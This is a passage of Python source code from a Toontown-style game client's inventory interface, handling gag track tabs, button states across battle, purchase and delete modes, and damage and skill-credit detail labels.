trackFrame.bind(DGG.WITHIN, self.enterTrackFrame, extraArgs=[track])
trackFrame.bind(DGG.WITHOUT, self.exitTrackFrame, extraArgs=[track])
self.trackRows.append(trackFrame)
self.trackTabs.append(trackTab)
adjustLeft = -0.065
self.trackNameLabels.append(DirectLabel(text=TextEncoder.upper(Tracks[track]), parent=self.trackRows[track], pos=(-0.72 + adjustLeft, -0.1, 0.01), scale=TTLocalizer.INtrackNameLabels, relief=None, text_fg=(0.2, 0.2, 0.2, 1), text_font=getInterfaceFont(), text_align=TextNode.ALeft, textMayChange=0))
self.trackBars.append(DirectWaitBar(parent=self.trackRows[track], pos=(-0.58 + adjustLeft, -0.1, -0.025), relief=DGG.SUNKEN, frameSize=(-0.6,
0.6,
-0.1,
0.1), borderWidth=(0.02, 0.02), scale=0.25, frameColor=(TrackColors[track][0] * 0.6,
TrackColors[track][1] * 0.6,
TrackColors[track][2] * 0.6,
1), barColor=(TrackColors[track][0] * 0.9,
TrackColors[track][1] * 0.9,
TrackColors[track][2] * 0.9,
1), text='0 / 0', text_scale=0.16, text_fg=(0, 0, 0, 0.8), text_align=TextNode.ACenter, text_pos=(0, -0.05)))
self.buttons.append([])
for item in range(0, len(Levels[track])):
button = DirectButton(parent=self.trackRows[track], image=(self.upButton,
self.downButton,
self.rolloverButton,
self.flatButton), geom=self.invModels[track][item], text='50', text_scale=0.04, text_align=TextNode.ARight, geom_scale=0.7, geom_pos=(-0.01, -0.1, 0), text_fg=Vec4(1, 1, 1, 1), text_pos=(0.07, -0.04), textMayChange=1, relief=None, image_color=(0, 0.6, 1, 1), pos=(self.ButtonXOffset + item * self.ButtonXSpacing + adjustLeft, -0.1, 0), command=self.__handleSelection, extraArgs=[track, item])
button.bind(DGG.ENTER, self.showDetail, extraArgs=[track, item])
button.bind(DGG.EXIT, self.hideDetail)
self.buttons[track].append(button)
for x in xrange(0, len(self.trackRows)):
self.hideTrack(x)
self.trackRows[x].setBin("gui-popup", 50)
for x in xrange(0, len(self.trackTabs)):
self.trackTabs[x].hide()
for x in xrange(0, len(self.trackTabs)):
if self.toon.hasTrackAccess(x):
self.trackTabs[x].show()
self.doTab(self.activeTab)
self.accept("alt-1", self.doTab, extraArgs=[0])
self.accept("alt-2", self.doTab, extraArgs=[1])
self.accept("alt-3", self.doTab, extraArgs=[2])
self.accept("alt-4", self.doTab, extraArgs=[3])
self.accept("alt-5", self.doTab, extraArgs=[4])
self.accept("alt-6", self.doTab, extraArgs=[5])
self.accept("alt-7", self.doTab, extraArgs=[6])
self.accept("alt-8", self.doTab, extraArgs=[7])
return
def doTab(self, index):
trackAccess = base.localAvatar.getTrackAccess()
if trackAccess[index] == 0:
return
self.activeTab = index
for track in xrange(len(self.trackRows)):
self.hideTrack(track)
self.trackTabs[track]['geom_color']= Vec4(TrackColors[track][0] * 0.6, TrackColors[track][1] * 0.6, TrackColors[track][2] * 0.6, 1)
self.trackTabs[index]['geom_color']= Vec4(TrackColors[index][0], TrackColors[index][1], TrackColors[index][2], 1)
self.showTrack(index)
for track in range(0, len(Tracks)):
for level in xrange(len(Levels[track])):
button = self.buttons[track][level]
if self.itemIsUsable(track, level):
button.show()
else:
button.hide()
self.accept("control-1", self.__handleSelection, extraArgs=[self.activeTab, 0, True])
self.accept("control-2", self.__handleSelection, extraArgs=[self.activeTab, 1, True])
self.accept("control-3", self.__handleSelection, extraArgs=[self.activeTab, 2, True])
self.accept("control-4", self.__handleSelection, extraArgs=[self.activeTab, 3, True])
self.accept("control-5", self.__handleSelection, extraArgs=[self.activeTab, 4, True])
self.accept("control-6", self.__handleSelection, extraArgs=[self.activeTab, 5, True])
self.accept("control-7", self.__handleSelection, extraArgs=[self.activeTab, 6, True])
def __handleSelection(self, track, level, viaKeyboard=False):
if self.activateMode == 'purchaseDelete' or self.activateMode == 'bookDelete' or self.activateMode == 'storePurchaseDelete':
if self.numItem(track, level):
self.useItem(track, level)
self.updateGUI(track, level)
messenger.send('inventory-deletion', [track, level])
self.showDetail(track, level)
elif self.activateMode == 'purchase' or self.activateMode == 'storePurchase':
messenger.send('inventory-selection', [track, level, viaKeyboard])
self.showDetail(track, level)
elif self.gagTutMode:
pass
else:
messenger.send('inventory-selection', [track, level, viaKeyboard])
def __handleRun(self):
messenger.send('inventory-run')
def __handleFire(self):
messenger.send('inventory-fire')
def __handleSOS(self):
messenger.send('inventory-sos')
def __handlePass(self):
messenger.send('inventory-pass')
def __handleLevels(self):
if settings.get('show-cog-levels', True):
settings['show-cog-levels'] = False
self.levelsButton['text'] = TTLocalizer.InventoryLevelsShow
else:
settings['show-cog-levels'] = True
self.levelsButton['text'] = TTLocalizer.InventoryLevelsHide
messenger.send('inventory-levels')
def __handleBackToPlayground(self):
messenger.send('inventory-back-to-playground')
def __zeroInvConfirm(self):
self.cleanupDialog()
self.dialog = TTDialog.TTDialog(style=TTDialog.YesNo, text=TTLocalizer.InventoryDeleteConfirm, command=self.__zeroInvAndUpdate)
self.dialog.show()
def __zeroInvAndUpdate(self, value):
self.cleanupDialog()
if value > 0:
self.zeroInv()
self.updateGUI()
def showDetail(self, track, level, event = None):
self.totalLabel.hide()
self.detailNameLabel.show()
self.detailNameLabel.configure(text=AvPropStrings[track][level], image_image=self.invModels[track][level])
self.detailNameLabel.configure(image_scale=20, image_pos=(-0.2, 0, -2.2))
self.detailAmountLabel.show()
self.detailAmountLabel.configure(text=TTLocalizer.InventoryDetailAmount % {'numItems': self.numItem(track, level),
'maxItems': self.getMax(track, level)})
self.detailDataLabel.show()
damage = getAvPropDamage(track, level, self.toon.experience.getExp(track))
organicBonus = self.toon.checkGagBonus(track, level)
propBonus = self.checkPropBonus(track)
damageBonusStr = ''
damageBonus = 0
if self.propAndOrganicBonusStack:
if propBonus:
damageBonus += getDamageBonus(damage)
if organicBonus:
damageBonus += getDamageBonus(damage)
if damageBonus:
damageBonusStr = TTLocalizer.InventoryDamageBonus % damageBonus
else:
if propBonus or organicBonus:
damageBonus += getDamageBonus(damage)
if damageBonus:
damageBonusStr = TTLocalizer.InventoryDamageBonus % damageBonus
accString = AvTrackAccStrings[track]
if (organicBonus or propBonus) and track == LURE_TRACK:
accString = TTLocalizer.BattleGlobalLureAccMedium
self.detailDataLabel.configure(text=TTLocalizer.InventoryDetailData % {'accuracy': accString,
'damageString': self.getToonupDmgStr(track, level),
'damage': damage,
'bonus': damageBonusStr,
'singleOrGroup': self.getSingleGroupStr(track, level)})
if self.itemIsCredit(track, level):
mult = self.__battleCreditMultiplier
if self.__respectInvasions:
mult *= self.__invasionCreditMultiplier
self.setDetailCredit(track, (level + 1) * mult)
else:
self.setDetailCredit(track, None)
self.detailCreditLabel.show()
return
def setDetailCredit(self, track, credit):
if credit != None:
if self.toon.earnedExperience:
maxCredit = ExperienceCap - self.toon.earnedExperience[track]
credit = min(credit, maxCredit)
credit = int(credit * 10 + 0.5)
if credit % 10 == 0:
credit /= 10
else:
credit /= 10.0
if self.detailCredit == credit:
return
if credit != None:
self.detailCreditLabel['text'] = TTLocalizer.InventorySkillCredit % credit
if self.detailCredit == None:
self.detailCreditLabel['text_fg'] = (0.05, 0.14, 0.4, 1)
else:
self.detailCreditLabel['text'] = TTLocalizer.InventorySkillCreditNone
self.detailCreditLabel['text_fg'] = (0.5, 0.0, 0.0, 1.0)
self.detailCredit = credit
return
def hideDetail(self, event = None):
self.totalLabel.show()
self.detailNameLabel.hide()
self.detailAmountLabel.hide()
self.detailDataLabel.hide()
self.detailCreditLabel.hide()
def noDetail(self):
self.totalLabel.hide()
self.detailNameLabel.hide()
self.detailAmountLabel.hide()
self.detailDataLabel.hide()
self.detailCreditLabel.hide()
def setActivateMode(self, mode, heal = 1, trap = 1, lure = 1, bldg = 0, creditLevel = None, tutorialFlag = 0, gagTutMode = 0):
self.notify.debug('setActivateMode() mode:%s heal:%s trap:%s lure:%s bldg:%s' % (mode,
heal,
trap,
lure,
bldg))
self.previousActivateMode = self.activateMode
self.activateMode = mode
self.deactivateButtons()
self.heal = heal
self.trap = trap
self.lure = lure
self.bldg = bldg
self.battleCreditLevel = creditLevel
self.tutorialFlag = tutorialFlag
self.gagTutMode = gagTutMode
self.__activateButtons()
self.enableUberGags()
return None
def setActivateModeBroke(self):
if self.activateMode == 'storePurchase':
self.setActivateMode('storePurchaseBroke')
elif self.activateMode == 'purchase':
self.setActivateMode('purchaseBroke', gagTutMode=self.gagTutMode)
else:
self.notify.error('Unexpected mode in setActivateModeBroke(): %s' % self.activateMode)
self.enableUberGags()
def deactivateButtons(self):
self.cleanupDialog()
if self.previousActivateMode == 'book':
self.bookDeactivateButtons()
elif self.previousActivateMode == 'bookDelete':
self.bookDeleteDeactivateButtons()
elif self.previousActivateMode == 'purchaseDelete':
self.purchaseDeleteDeactivateButtons()
elif self.previousActivateMode == 'purchase':
self.purchaseDeactivateButtons()
elif self.previousActivateMode == 'purchaseBroke':
self.purchaseBrokeDeactivateButtons()
elif self.previousActivateMode == 'gagTutDisabled':
self.gagTutDisabledDeactivateButtons()
elif self.previousActivateMode == 'battle':
self.battleDeactivateButtons()
elif self.previousActivateMode == 'storePurchaseDelete':
self.storePurchaseDeleteDeactivateButtons()
elif self.previousActivateMode == 'storePurchase':
self.storePurchaseDeactivateButtons()
elif self.previousActivateMode == 'storePurchaseBroke':
self.storePurchaseBrokeDeactivateButtons()
elif self.previousActivateMode == 'plantTree':
self.plantTreeDeactivateButtons()
else:
self.notify.error('No such mode as %s' % self.previousActivateMode)
return None
def __activateButtons(self):
self.cleanupDialog()
if hasattr(self, 'activateMode'):
if self.activateMode == 'book':
self.bookActivateButtons()
elif self.activateMode == 'bookDelete':
self.bookDeleteActivateButtons()
elif self.activateMode == 'purchaseDelete':
self.purchaseDeleteActivateButtons()
elif self.activateMode == 'purchase':
self.purchaseActivateButtons()
elif self.activateMode == 'purchaseBroke':
self.purchaseBrokeActivateButtons()
elif self.activateMode == 'gagTutDisabled':
self.gagTutDisabledActivateButtons()
elif self.activateMode == 'battle':
self.battleActivateButtons()
elif self.activateMode == 'storePurchaseDelete':
self.storePurchaseDeleteActivateButtons()
elif self.activateMode == 'storePurchase':
self.storePurchaseActivateButtons()
elif self.activateMode == 'storePurchaseBroke':
self.storePurchaseBrokeActivateButtons()
elif self.activateMode == 'plantTree':
self.plantTreeActivateButtons()
else:
self.notify.error('No such mode as %s' % self.activateMode)
self.doTab(self.activeTab)
return None
def bookActivateButtons(self):
self.setPos(0, 0, 0.52)
self.setScale(1.0)
self.detailFrame.setPos(0.1, 0, -0.855)
self.detailFrame.setScale(0.75)
self.deleteEnterButton.hide()
self.deleteAllButton.hide()
self.deleteExitButton.hide()
self.invFrame.reparentTo(self)
self.invFrame.setPos(0, 0, 0)
self.invFrame.setScale(1)
for track in range(len(Tracks)):
if self.toon.hasTrackAccess(track):
self.showTrack(track)
for level in range(len(Levels[track])):
button = self.buttons[track][level]
if self.itemIsUsable(track, level):
button.show()
self.makeBookUnpressable(button, track, level)
else:
button.hide()
else:
self.hideTrack(track)
return None
def bookDeactivateButtons(self):
self.deleteEnterButton['command'] = None
return
def bookDeleteActivateButtons(self):
messenger.send('enterBookDelete')
self.setPos(-0.2, 0, 0.4)
self.setScale(0.8)
self.deleteEnterButton.hide()
self.deleteEnterButton.setPos(1.029, 0, -0.639)
self.deleteEnterButton.setScale(0.75)
self.deleteExitButton.show()
self.deleteExitButton.setPos(1.029, 0, -0.639)
self.deleteExitButton.setScale(0.75)
self.deleteHelpText.show()
self.invFrame.reparentTo(self)
self.invFrame.setPos(0, 0, 0)
self.invFrame.setScale(1)
self.deleteExitButton['command'] = self.setActivateMode
self.deleteExitButton['extraArgs'] = [self.previousActivateMode]
for track in range(len(Tracks)):
if self.toon.hasTrackAccess(track):
self.showTrack(track)
for level in range(len(Levels[track])):
button = self.buttons[track][level]
if self.itemIsUsable(track, level):
button.show()
if self.numItem(track, level) <= 0:
self.makeUnpressable(button, track, level)
else:
self.makeDeletePressable(button, track, level)
else:
button.hide()
else:
self.hideTrack(track)
def bookDeleteDeactivateButtons(self):
messenger.send('exitBookDelete')
self.deleteHelpText.hide()
self.deleteDeactivateButtons()
def purchaseDeleteActivateButtons(self):
self.reparentTo(aspect2d)
self.setPos(0.2, 0, -0.04)
self.setScale(1)
if self.purchaseFrame == None:
self.loadPurchaseFrame()
self.purchaseFrame.show()
self.invFrame.reparentTo(self.purchaseFrame)
self.invFrame.setPos(-0.235, 0, 0.52)
self.invFrame.setScale(0.81)
self.detailFrame.setPos(1.17, 0, -0.02)
self.detailFrame.setScale(1.25)
self.deleteEnterButton.hide()
self.deleteEnterButton.setPos(-0.441, 0, -0.917)
self.deleteEnterButton.setScale(0.75)
self.deleteExitButton.show()
self.deleteExitButton.setPos(-0.441, 0, -0.917)
self.deleteExitButton.setScale(0.75)
self.deleteExitButton['command'] = self.setActivateMode
self.deleteExitButton['extraArgs'] = [self.previousActivateMode]
for track in range(len(Tracks)):
if self.toon.hasTrackAccess(track):
self.showTrack(track)
for level in range(len(Levels[track])):
button = self.buttons[track][level]
if self.itemIsUsable(track, level):
button.show()
if self.numItem(track, level) <= 0 or level >= UBER_GAG_LEVEL_INDEX:
self.makeUnpressable(button, track, level)
else:
self.makeDeletePressable(button, track, level)
else:
button.hide()
else:
self.hideTrack(track)
return
def purchaseDeleteDeactivateButtons(self):
self.invFrame.reparentTo(self)
self.purchaseFrame.hide()
self.deleteDeactivateButtons()
for track in range(len(Tracks)):
if self.toon.hasTrackAccess(track):
self.showTrack(track)
for level in range(len(Levels[track])):
button = self.buttons[track][level]
if self.itemIsUsable(track, level):
button.show()
if self.numItem(track, level) <= 0 or level >= UBER_GAG_LEVEL_INDEX:
self.makeUnpressable(button, track, level)
else:
self.makeDeletePressable(button, track, level)
else:
button.hide()
else:
self.hideTrack(track)
def storePurchaseDeleteActivateButtons(self):
self.reparentTo(aspect2d)
self.setPos(0.2, 0, -0.04)
self.setScale(1)
if self.storePurchaseFrame == None:
self.loadStorePurchaseFrame()
self.storePurchaseFrame.show()
self.invFrame.reparentTo(self.storePurchaseFrame)
self.invFrame.setPos(-0.23, 0, 0.505)
self.invFrame.setScale(0.81)
self.detailFrame.setPos(1.175, 0, 0)
self.detailFrame.setScale(1.25)
self.deleteEnterButton.hide()
self.deleteEnterButton.setPos(-0.55, 0, -0.91)
self.deleteEnterButton.setScale(0.75)
self.deleteExitButton.show()
self.deleteExitButton.setPos(-0.55, 0, -0.91)
self.deleteExitButton.setScale(0.75)
self.deleteExitButton['command'] = self.setActivateMode
self.deleteExitButton['extraArgs'] = [self.previousActivateMode]
for track in range(len(Tracks)):
if self.toon.hasTrackAccess(track):
self.showTrack(track)
for level in range(len(Levels[track])):
button = self.buttons[track][level]
if self.itemIsUsable(track, level):
button.show()
if self.numItem(track, level) <= 0 or level >= UBER_GAG_LEVEL_INDEX:
self.makeUnpressable(button, track, level)
else:
self.makeDeletePressable(button, track, level)
else:
button.hide()
else:
self.hideTrack(track)
return
def storePurchaseDeleteDeactivateButtons(self):
self.invFrame.reparentTo(self)
self.storePurchaseFrame.hide()
self.deleteDeactivateButtons()
def storePurchaseBrokeActivateButtons(self):
self.reparentTo(aspect2d)
self.setPos(0.2, 0, -0.04)
self.setScale(1)
if self.storePurchaseFrame == None:
self.loadStorePurchaseFrame()
self.storePurchaseFrame.show()
self.invFrame.reparentTo(self.storePurchaseFrame)
self.invFrame.setPos(-0.23, 0, 0.505)
self.invFrame.setScale(0.81)
self.detailFrame.setPos(1.175, 0, 0)
self.detailFrame.setScale(1.25)
self.deleteAllButton.show()
self.deleteEnterButton.show()
self.deleteEnterButton.setPos(-0.55, 0, -0.91)
self.deleteEnterButton.setScale(0.75)
self.deleteExitButton.hide()
self.deleteExitButton.setPos(-0.551, 0, -0.91)
self.deleteExitButton.setScale(0.75)
for track in range(len(Tracks)):
if self.toon.hasTrackAccess(track):
self.showTrack(track)
for level in range(len(Levels[track])):
button = self.buttons[track][level]
if self.itemIsUsable(track, level):
button.show()
self.makeUnpressable(button, track, level)
else:
button.hide()
else:
self.hideTrack(track)
return
def storePurchaseBrokeDeactivateButtons(self):
self.invFrame.reparentTo(self)
self.storePurchaseFrame.hide()
def deleteActivateButtons(self):
self.reparentTo(aspect2d)
self.setPos(0, 0, 0)
self.setScale(1)
self.deleteEnterButton.hide()
self.deleteExitButton.show()
self.deleteExitButton['command'] = self.setActivateMode
self.deleteExitButton['extraArgs'] = [self.previousActivateMode]
for track in range(len(Tracks)):
if self.toon.hasTrackAccess(track):
self.showTrack(track)
for level in range(len(Levels[track])):
button = self.buttons[track][level]
if self.itemIsUsable(track, level):
button.show()
if self.numItem(track, level) <= 0:
self.makeUnpressable(button, track, level)
else:
self.makePressable(button, track, level)
else:
button.hide()
else:
self.hideTrack(track)
return None
def deleteDeactivateButtons(self):
self.deleteExitButton['command'] = None
return
def purchaseActivateButtons(self):
self.reparentTo(aspect2d)
self.setPos(0.2, 0, -0.04)
self.setScale(1)
if self.purchaseFrame == None:
self.loadPurchaseFrame()
self.purchaseFrame.show()
self.invFrame.reparentTo(self.purchaseFrame)
self.invFrame.setPos(-0.235, 0, 0.52)
self.invFrame.setScale(0.81)
self.detailFrame.setPos(1.17, 0, -0.02)
self.detailFrame.setScale(1.25)
totalProps = self.totalProps
maxProps = self.toon.getMaxCarry()
self.deleteAllButton.show()
self.deleteEnterButton.show()
self.deleteEnterButton.setPos(-0.441, 0, -0.917)
self.deleteEnterButton.setScale(0.75)
self.deleteExitButton.hide()
self.deleteExitButton.setPos(-0.441, 0, -0.917)
self.deleteExitButton.setScale(0.75)
if self.gagTutMode:
self.deleteAllButton.hide()
self.deleteEnterButton.hide()
self.deleteEnterButton['command'] = self.setActivateMode
self.deleteEnterButton['extraArgs'] = ['purchaseDelete']
for track in range(len(Tracks)):
if self.toon.hasTrackAccess(track):
self.showTrack(track)
for level in range(len(Levels[track])):
button = self.buttons[track][level]
if self.itemIsUsable(track, level):
button.show()
unpaid = not base.cr.isPaid()
if self.numItem(track, level) >= self.getMax(track, level) or totalProps == maxProps or unpaid and gagIsPaidOnly(track, level) or level > LAST_REGULAR_GAG_LEVEL:
if gagIsPaidOnly(track, level):
self.makeDisabledPressable(button, track, level)
elif unpaid and gagIsVelvetRoped(track, level):
self.makeDisabledPressable(button, track, level)
else:
self.makeUnpressable(button, track, level)
elif unpaid and gagIsVelvetRoped(track, level):
self.makeDisabledPressable(button, track, level)
else:
self.makePressable(button, track, level)
else:
button.hide()
else:
self.hideTrack(track)
return
def purchaseDeactivateButtons(self):
self.invFrame.reparentTo(self)
self.purchaseFrame.hide()
def storePurchaseActivateButtons(self):
self.reparentTo(aspect2d)
self.setPos(0.2, 0, -0.04)
self.setScale(1)
if self.storePurchaseFrame == None:
self.loadStorePurchaseFrame()
self.storePurchaseFrame.show()
self.invFrame.reparentTo(self.storePurchaseFrame)
self.invFrame.setPos(-0.23, 0, 0.505)
self.invFrame.setScale(0.81)
self.detailFrame.setPos(1.175, 0, 0)
self.detailFrame.setScale(1.25)
totalProps = self.totalProps
maxProps = self.toon.getMaxCarry()
self.deleteAllButton.show()
self.deleteEnterButton.show()
self.deleteEnterButton.setPos(-0.55, 0, -0.91)
self.deleteEnterButton.setScale(0.75)
self.deleteExitButton.hide()
self.deleteExitButton.setPos(-0.55, 0, -0.91)
self.deleteExitButton.setScale(0.75)
self.deleteEnterButton['command'] = self.setActivateMode
self.deleteEnterButton['extraArgs'] = ['storePurchaseDelete']
for track in range(len(Tracks)):
if self.toon.hasTrackAccess(track):
self.showTrack(track)
for level in range(len(Levels[track])):
button = self.buttons[track][level]
if self.itemIsUsable(track, level):
button.show()
unpaid = not base.cr.isPaid()
if self.numItem(track, level) >= self.getMax(track, level) or totalProps == maxProps or unpaid and gagIsPaidOnly(track, level) or level > LAST_REGULAR_GAG_LEVEL:
if gagIsPaidOnly(track, level):
self.makeDisabledPressable(button, track, level)
elif unpaid and gagIsVelvetRoped(track, level):
self.makeDisabledPressable(button, track, level)
else:
self.makeUnpressable(button, track, level)
elif unpaid and gagIsVelvetRoped(track, level):
self.makeDisabledPressable(button, track, level)
else:
self.makePressable(button, track, level)
else:
button.hide()
else:
self.hideTrack(track)
return
def storePurchaseDeactivateButtons(self):
self.invFrame.reparentTo(self)
self.storePurchaseFrame.hide()
def purchaseBrokeActivateButtons(self):
self.reparentTo(aspect2d)
self.setPos(0.2, 0, -0.04)
self.setScale(1)
if self.purchaseFrame == None:
self.loadPurchaseFrame()
self.purchaseFrame.show()
self.invFrame.reparentTo(self.purchaseFrame)
self.invFrame.setPos(-0.235, 0, 0.52)
self.invFrame.setScale(0.81)
self.detailFrame.setPos(1.17, 0, -0.02)
self.detailFrame.setScale(1.25)
self.deleteAllButton.show()
self.deleteEnterButton.show()
self.deleteEnterButton.setPos(-0.441, 0, -0.917)
self.deleteEnterButton.setScale(0.75)
self.deleteExitButton.hide()
self.deleteExitButton.setPos(-0.441, 0, -0.917)
self.deleteExitButton.setScale(0.75)
if self.gagTutMode:
self.deleteEnterButton.hide()
for track in range(len(Tracks)):
if self.toon.hasTrackAccess(track):
self.showTrack(track)
for level in range(len(Levels[track])):
button = self.buttons[track][level]
if self.itemIsUsable(track, level):
button.show()
if not self.gagTutMode:
self.makeUnpressable(button, track, level)
else:
button.hide()
else:
self.hideTrack(track)
return
def purchaseBrokeDeactivateButtons(self):
self.invFrame.reparentTo(self)
self.purchaseFrame.hide()
def gagTutDisabledActivateButtons(self):
self.reparentTo(aspect2d)
self.setPos(0.2, 0, -0.04)
self.setScale(1)
if self.purchaseFrame == None:
self.loadPurchaseFrame()
self.purchaseFrame.show()
self.invFrame.reparentTo(self.purchaseFrame)
self.invFrame.setPos(-0.235, 0, 0.52)
self.invFrame.setScale(0.81)
self.detailFrame.setPos(1.17, 0, -0.02)
self.detailFrame.setScale(1.25)
self.deleteExitButton.hide()
self.deleteEnterButton.hide()
self.deleteAllButton.hide()
def gagTutDisabledDeactivateButtons(self):
self.invFrame.reparentTo(self)
self.purchaseFrame.hide()
def battleActivateButtons(self):
self.stopAndClearPropBonusIval()
self.reparentTo(aspect2d)
self.setPos(0, 0, 0.1)
self.setScale(1)
if self.battleFrame == None:
self.loadBattleFrame()
self.battleFrame.show()
self.battleFrame.setScale(0.9)
self.invFrame.reparentTo(self.battleFrame)
self.invFrame.setPos(0, 0, -0.25)
self.invFrame.setScale(1)
self.detailFrame.setPos(1.125, 0, -0.15)
self.detailFrame.setScale(1)
self.deleteAllButton.hide()
self.deleteEnterButton.hide()
self.deleteExitButton.hide()
if self.bldg == 1:
self.runButton.hide()
self.sosButton.show()
self.passButton.show()
self.levelsButton.show()
elif self.tutorialFlag == 1:
self.runButton.hide()
self.sosButton.hide()
self.passButton.hide()
self.fireButton.hide()
self.levelsButton.hide()
else:
self.runButton.show()
self.sosButton.show()
self.passButton.show()
self.fireButton.show()
self.levelsButton.show()
if localAvatar.getPinkSlips() > 0:
self.fireButton['state'] = DGG.NORMAL
self.fireButton['image_color'] = Vec4(0, 0.6, 1, 1)
else:
self.fireButton['state'] = DGG.DISABLED
self.fireButton['image_color'] = Vec4(0.4, 0.4, 0.4, 1)
if settings.get('show-cog-levels', True):
self.levelsButton['text'] = TTLocalizer.InventoryLevelsHide
else:
self.levelsButton['text'] = TTLocalizer.InventoryLevelsShow
for track in range(len(Tracks)):
if self.toon.hasTrackAccess(track):
self.showTrack(track)
for level in range(len(Levels[track])):
button = self.buttons[track][level]
if self.itemIsUsable(track, level):
unpaid = not base.cr.isPaid()
button.show()
if self.numItem(track, level) <= 0 or track == HEAL_TRACK and not self.heal or track == TRAP_TRACK and not self.trap or track == LURE_TRACK and not self.lure:
self.makeUnpressable(button, track, level)
elif unpaid and gagIsVelvetRoped(track, level):
self.makeDisabledPressable(button, track, level)
elif self.itemIsCredit(track, level):
self.makePressable(button, track, level)
else:
self.makeNoncreditPressable(button, track, level)
else:
button.hide()
else:
self.hideTrack(track)
self.propBonusIval.loop()
return
def battleDeactivateButtons(self):
self.invFrame.reparentTo(self)
self.levelsButton.hide()
self.battleFrame.hide()
self.stopAndClearPropBonusIval()
def plantTreeActivateButtons(self):
self.reparentTo(aspect2d)
self.setPos(0, 0, 0.1)
self.setScale(1)
if self.battleFrame == None:
self.loadBattleFrame()
self.battleFrame.show()
self.battleFrame.setScale(0.9)
self.invFrame.reparentTo(self.battleFrame)
self.invFrame.setPos(-0.25, 0, 0.35)
self.invFrame.setScale(1)
self.detailFrame.setPos(1.125, 0, -0.08)
self.detailFrame.setScale(1)
self.deleteAllButton.hide()
self.deleteEnterButton.hide()
self.deleteExitButton.hide()
self.runButton.hide()
self.sosButton.hide()
self.levelsButton.hide()
self.passButton['text'] = TTLocalizer.lCancel
self.passButton.show()
for track in range(len(Tracks)):
if self.toon.hasTrackAccess(track):
self.showTrack(track)
for level in range(len(Levels[track])):
button = self.buttons[track][level]
if self.itemIsUsable(track, level) and (level == 0 or self.toon.doIHaveRequiredTrees(track, level)):
button.show()
self.makeUnpressable(button, track, level)
if self.numItem(track, level) > 0:
if not self.toon.isTreePlanted(track, level):
self.makePressable(button, track, level)
else:
button.hide()
else:
self.hideTrack(track)
return
def plantTreeDeactivateButtons(self):
self.passButton['text'] = TTLocalizer.InventoryPass
self.invFrame.reparentTo(self)
self.levelsButton.hide()
self.battleFrame.hide()
def itemIsUsable(self, track, level):
if self.gagTutMode:
trackAccess = self.toon.getTrackAccess()
return trackAccess[track] >= level + 1
curSkill = self.toon.experience.getExp(track)
if curSkill < Levels[track][level]:
return 0
else:
return 1
def itemIsCredit(self, track, level):
if self.toon.earnedExperience:
if self.toon.earnedExperience[track] >= ExperienceCap:
return 0
if self.battleCreditLevel == None:
return 1
else:
return level < self.battleCreditLevel
return
def getMax(self, track, level):
if self.gagTutMode and (track not in (4, 5) or level > 0):
return 1
return InventoryBase.InventoryBase.getMax(self, track, level)
def getCurAndNextExpValues(self, track):
curSkill = self.toon.experience.getExp(track)
retVal = MaxSkill
for amount in Levels[track]:
if curSkill < amount:
retVal = amount
return (curSkill, retVal)
return (curSkill, retVal)
def makePressable(self, button, track, level):
organicBonus = self.toon.checkGagBonus(track, level)
propBonus = self.checkPropBonus(track)
bonus = organicBonus or propBonus
if bonus:
shadowColor = self.ShadowBuffedColor
else:
shadowColor = self.ShadowColor
button.configure(image0_image=self.upButton, image2_image=self.rolloverButton, text_shadow=shadowColor, geom_color=self.PressableGeomColor, commandButtons=(DGG.LMB,))
if self._interactivePropTrackBonus == track:
button.configure(image_color=self.PropBonusPressableImageColor)
self.addToPropBonusIval(button)
else:
button.configure(image_color=self.PressableImageColor)
def makeDisabledPressable(self, button, track, level):
organicBonus = self.toon.checkGagBonus(track, level)
propBonus = self.checkPropBonus(track)
bonus = organicBonus or propBonus
if bonus:
shadowColor = self.UnpressableShadowBuffedColor
else:
shadowColor = self.ShadowColor
button.configure(text_shadow=shadowColor, geom_color=self.UnpressableGeomColor, image_image=self.flatButton, commandButtons=(DGG.LMB,))
button.configure(image_color=self.UnpressableImageColor)
def makeNoncreditPressable(self, button, track, level):
organicBonus = self.toon.checkGagBonus(track, level)
propBonus = self.checkPropBonus(track)
bonus = organicBonus or propBonus
if bonus:
shadowColor = self.ShadowBuffedColor
else:
shadowColor = self.ShadowColor
button.configure(image0_image=self.upButton, image2_image=self.rolloverButton, text_shadow=shadowColor, geom_color=self.PressableGeomColor, commandButtons=(DGG.LMB,))
if self._interactivePropTrackBonus == track:
button.configure(image_color=self.PropBonusNoncreditPressableImageColor)
self.addToPropBonusIval(button)
else:
button.configure(image_color=self.NoncreditPressableImageColor)
def makeDeletePressable(self, button, track, level):
organicBonus = self.toon.checkGagBonus(track, level)
propBonus = self.checkPropBonus(track)
bonus = organicBonus or propBonus
if bonus:
shadowColor = self.ShadowBuffedColor
else:
shadowColor = self.ShadowColor
button.configure(image0_image=self.upButton, image2_image=self.rolloverButton, text_shadow=shadowColor, geom_color=self.PressableGeomColor, commandButtons=(DGG.LMB,))
button.configure(image_color=self.DeletePressableImageColor)
def makeUnpressable(self, button, track, level):
organicBonus = self.toon.checkGagBonus(track, level)
propBonus = self.checkPropBonus(track)
bonus = organicBonus or propBonus
if bonus:
shadowColor = self.UnpressableShadowBuffedColor
else:
shadowColor = self.ShadowColor
button.configure(text_shadow=shadowColor, geom_color=self.UnpressableGeomColor, image_image=self.flatButton, commandButtons=())
button.configure(image_color=self.UnpressableImageColor)
def makeBookUnpressable(self, button, track, level):
organicBonus = self.toon.checkGagBonus(track, level)
propBonus = self.checkPropBonus(track)
bonus = organicBonus or propBonus
if bonus:
shadowColor = self.ShadowBuffedColor
else:
shadowColor = self.ShadowColor
button.configure(text_shadow=shadowColor, geom_color=self.BookUnpressableGeomColor, image_image=self.flatButton, commandButtons=())
button.configure(image0_color=self.BookUnpressableImage0Color, image2_color=self.BookUnpressableImage2Color)
def hideTrack(self, trackIndex):
self.trackNameLabels[trackIndex].hide()
self.trackBars[trackIndex].hide()
self.trackRows[trackIndex].hide()
for levelIndex in xrange(0, len(Levels[trackIndex])):
self.buttons[trackIndex][levelIndex].hide()
def showTrack(self, trackIndex):
self.trackNameLabels[trackIndex].show()
self.trackBars[trackIndex].show()
self.trackRows[trackIndex].show()
for levelIndex in xrange(0, len(Levels[trackIndex])):
self.buttons[trackIndex][levelIndex].show()
curExp, nextExp = self.getCurAndNextExpValues(trackIndex)
if curExp >= regMaxSkill:
self.trackBars[trackIndex]['range'] = UberSkill
self.trackBars[trackIndex]['text'] = TTLocalizer.InventoryUberTrackExp % {'nextExp': MaxSkill - curExp}
else:
self.trackBars[trackIndex]['range'] = nextExp
